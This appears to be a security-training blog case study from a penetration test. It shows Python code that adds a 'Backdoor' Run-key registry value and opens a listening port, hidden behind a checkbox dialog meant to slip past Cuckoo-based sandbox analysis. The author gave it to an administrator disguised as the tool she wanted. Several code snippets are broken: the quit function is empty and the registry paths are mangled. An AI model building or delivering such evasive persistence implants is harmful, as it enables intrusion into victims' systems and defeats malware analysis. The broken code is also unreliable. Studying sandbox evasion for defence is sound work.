Case Study: Evading Automated Sandbox - Python PoC
Introduction
With the increasing of Sandbox technology usage, every penetration tester should be prepared to face it one day. While a plenty of Pentest tools are out there, forging your own code can help you in this tough case where those tools fail.
FREE role-guided training plans
Recently we've been doing a black box penetration testing for one of our clients where social engineering and client side attacks are allowed. During the information gathering phase, we suspected that they were using Sandbox technology along with signature based AV to protect a specific critical -obviously- part of the domain. Thankfully, our reconnaissance result turns out that one of the system admins was searching around in forums for free software to automate a certain task. The task was doable however, bypassing Sandbox analysis was my main concern. Let's see how useful that output was for us and take a closer look on the coding part!
In this article, I will share part of the code which I actually used to trick the Sandbox and gain the administrator trust to run the script. Please keep in mind that the actual script contained the task which the admin was seeking in the first place, otherwise it would raise her suspicions.
Approach
Below are some methods used by malware developers to detect and escape from Sandbox environment as documented by FireEye researchers:-
- Human interaction—mouse clicks and dialog boxes.
- Configuration-specific—sleep calls, time triggers, process hiding, malicious downloaders, execution name of the analyzed files, volume information, and execution after reboot.
- Environment-specific—version, embedded iframes (in flash, swf, jpg files), embedded executable in an image file, and DLL loaders.
- VMware-specific—system-service lists, unique files, and the VMX port.
In our scenario, using a human interaction method was the most suitable one. Since our victim was looking for a script that we will provide in the first place, it wouldn't hurt to add a simple check-box dialog to provide some options where the victim has to choose in order to proceed for code execution.
Action Plan
- Create a script that makes changes to the OS, such as opening a port and add a registry value.
- Submit it against online Sandbox analyzer, such as Malwr, which is based on open source Cuckoo.
- Add the evasion technique to our script.
- Test again and see the difference.
Phase 1, 2
One of the favorite things for a hacker is to add a registry key for persistence purpose. There must also be a way to communicate between the hacker and his victim. Let's write up a quick Python code to parse windows registry and add a string value, as well as open a TCP port.
[bash]
import _winreg as wreg
# part 1
key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionRun",0, wreg.KEY_ALL_ACCESS)
wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:bla.exe')
# part 2
s = socket.socket()
host = socket.gethostname()
port = 80
s.bind((host, port))
s.listen(5)
The code is quite simple, . in In the first part we opened a registry directory Software Microsoft Windows CurrentVersion Run then we added a string value called "Backdoor" as well as a data value pointing to an exe directory ('C:bla.exe')
The second part will just open a port 80 and listen for incoming connection on the port.
Next, I used Pyinstaller to export the script into exe format. I named the file Sandboxing.exe and submitted into Malwar website, in summary the analysis output could detect our actions as you can see below
-For the full analysis report, please see
https://malwr.com/analysis/ZjAxMDU1NzFmYWJhNGM1ODg0MTc1MjdiMWEzOTU4OTY/
Phase 3, 4
Now is the fun part. As I stated earlier, we need to create a check-box dialog window where the user must click, first, on one of the provided check-box list, then secondly on the continue button.
Important note: Cuckoo is intelligent enough to bypass a regular Messagebox trick. Therefore, in our code we forced the user to do a couple of actions, tick a check box then click on Continue button.
[bash]
from Tkinter import *
master = Tk()
def evasion():
def donothing(): # …………… 1
# Do nothin'
pass
master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing
# …………… 2
Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)
var1 = IntVar()
Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)
var2 = IntVar()
# …………… 3
def quit():
if var1.get() == 1 or var2.get() ==1:
Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
mainloop() # …………… 4
evasion()
[/bash]
I used a very popular Python library called Tkinter to do the GUI job for me, . first First we created an object called master, then under evasion function
(1)We disabled the "X" button.
(2)Creating a label text message with two check buttons – two trivial options are created here for "online" and "offline" editing.
(3)Create a continue Button, once clicked, it will destroy the dialog window if and only if one of the check boxes have been ticked first,first; we achieved this using the quit function.
(4)Keep in mind without destroying this window,window; our malicious code (opening a port and add a registry key) will not be executed.
The end result is something similar to
Wrapping up the complete code:-
[bash]
from Tkinter import *
master = Tk()
def evasion():
def donothing():
# Do nothin'
pass
master.protocol("WM_DELETE_WINDOW", donothing) # when X is clicked, do nothing
Label(master, text=" Choose Your Editing Type: ").grid(row=0, sticky=W)
var1 = IntVar()
Checkbutton(master, text=" Online Editing ", variable=var1).grid(row=1, sticky=W)
var2 = IntVar()
def quit():
if var1.get() == 1 or var2.get() ==1:
Button(master, text='Continue', command=quit).grid(row=4, sticky=W, pady=4)
mainloop()
evasion()
import _winreg as wreg
import socket
key = wreg.OpenKey(wreg.HKEY_CURRENT_USER, "SoftwareMicrosoftWindowsCurrentVersionRun",0, wreg.KEY_ALL_ACCESS)
wreg.SetValueEx(key, 'Backdoor', 0, wreg.REG_SZ,'C:bla.exe')
s = socket.socket()
host = socket.gethostname()
port = 80
s.bind((host, port))
s.listen(5)
Once again, exporting the script into exe, submitting into Malwr, but this time the result didn't mention anything on opening a port or a registry key.
For the full analysis report, please see
https://malwr.com/analysis/NGRlNjE5MWUzZGVlNDcyZmJjMTliYTM1MTczMTlmMDk/
However, if you run it under a live environment, you would see the final result as
Wonderful!!
Think out of the box
Based on the first analysis report, the Malwr binds an IP of 192.168.56.X to port 80, this subnet mask looks very family to VirtualBox users since it's exactly the same subnet used by VirtualBox host-only interface. Do you think that this info can help in bypassing VM environment? Please share your thoughts in the comment section.
What should you learn next?
References
-
Evading File-based Sandboxes, by FireEye team
https://www.fireeye.com/content/dam/legacy/resources/pdfs/fireeye-hot-knives-through-butter.pdf
-
Malwr Services